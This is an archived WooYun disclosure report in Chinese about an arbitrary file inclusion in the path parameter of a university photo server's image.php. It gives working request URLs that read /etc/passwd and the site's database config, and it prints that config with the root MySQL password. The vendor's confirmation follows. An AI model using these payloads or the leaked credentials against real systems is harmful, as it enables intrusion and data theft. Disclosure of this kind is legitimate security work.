乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-23: 细节已通知厂商并且等待厂商处理中 2015-09-24: 厂商已经确认,细节仅向厂商公开 2015-10-04: 细节向核心白帽子及相关领域专家公开 2015-10-14: 细节向普通白帽子公开 2015-10-24: 细节向实习白帽子公开 2015-11-08: 细节向公众公开
简单的任意文件包含没有任何技巧
http://photo.uestc.edu.cn/image.php?path=其中path存在任意文件包含http://photo.uestc.edu.cn/image.php?path=/etc/passwd
http://photo.uestc.edu.cn/image.php?path=/var/www/admin/application/config/database.php
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');/*| -------------------------------------------------------------------| DATABASE CONNECTIVITY SETTINGS| -------------------------------------------------------------------| This file will contain the settings needed to access your database.|| For complete instructions please consult the 'Database Connection'| page of the User Guide.|| -------------------------------------------------------------------| EXPLANATION OF VARIABLES| -------------------------------------------------------------------|| ['hostname'] The hostname of your database server.| ['username'] The username used to connect to the database| ['password'] The password used to connect to the database| ['database'] The name of the database you want to connect to| ['dbdriver'] The database type. ie: mysql. Currently supported: mysql, mysqli, postgre, odbc, mssql, sqlite, oci8| ['dbprefix'] You can add an optional prefix, which will be added| to the table name when using the Active Record class| ['pconnect'] TRUE/FALSE - Whether to use a persistent connection| ['db_debug'] TRUE/FALSE - Whether database errors should be displayed.| ['cache_on'] TRUE/FALSE - Enables/disables query caching| ['cachedir'] The path to the folder where cache files should be stored| ['char_set'] The character set used in communicating with the database| ['dbcollat'] The character collation used in communicating with the database| NOTE: For MySQL and MySQLi databases, this setting is only used| as a backup if your server is running PHP < 5.2.3 or MySQL < 5.0.7.| There is an incompatibility in PHP with mysql_real_escape_string() which| can make your site vulnerable to SQL injection if you are using a| multi-byte character set and are running versions lower than these.| Sites using Latin-1 or UTF-8 database character set and collation are unaffected.| ['swap_pre'] A default table prefix that should be swapped with the dbprefix| ['autoinit'] Whether or not to automatically initialize the database.| ['stricton'] TRUE/FALSE - forces 'Strict Mode' connections| - good for ensuring strict SQL while developing|| The $active_group variable lets you choose which connection group to| make active. By default there is only one group (the 'default' group).|| The $active_record variables lets you determine whether or not to load| the active record class*/$active_group = 'default';$active_record = TRUE;$db['default']['hostname'] = '127.0.0.1';$db['default']['username'] = 'root';$db['default']['password'] = 'ukf8rz5gv8';$db['default']['database'] = 'epaper2013';$db['default']['dbdriver'] = 'mysql';$db['default']['dbprefix'] = '';$db['default']['pconnect'] = TRUE;$db['default']['db_debug'] = TRUE;$db['default']['cache_on'] = FALSE;$db['default']['cachedir'] = '';$db['default']['char_set'] = 'utf8';$db['default']['dbcollat'] = 'utf8_general_ci';$db['default']['swap_pre'] = '';$db['default']['autoinit'] = TRUE;$db['default']['stricton'] = FALSE;/* End of file database.php *//* Location: ./application/config/database.php */
如上
你比我懂
危害等级:中
漏洞Rank:10
确认时间:2015-09-24 10:06
已经确认漏洞,并通知负责人跟进,谢谢
暂无